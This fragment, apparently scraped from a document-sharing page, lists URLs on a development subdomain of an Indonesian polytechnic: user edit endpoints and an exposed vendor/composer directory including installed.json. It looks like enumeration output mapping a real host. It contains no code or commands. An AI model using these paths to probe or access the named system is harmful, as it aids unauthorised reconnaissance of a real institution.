http://dev-ubk.polindra.ac.id/users/edit/
http://dev-ubk.polindra.ac.id/users/edit/1
http://dev-ubk.polindra.ac.id/users/edit_info
http://dev-ubk.polindra.ac.id/vendor/
http://dev-ubk.polindra.ac.id/vendor/composer/
http://dev-ubk.polindra.ac.id/vendor/composer/installed.json

59

You might also like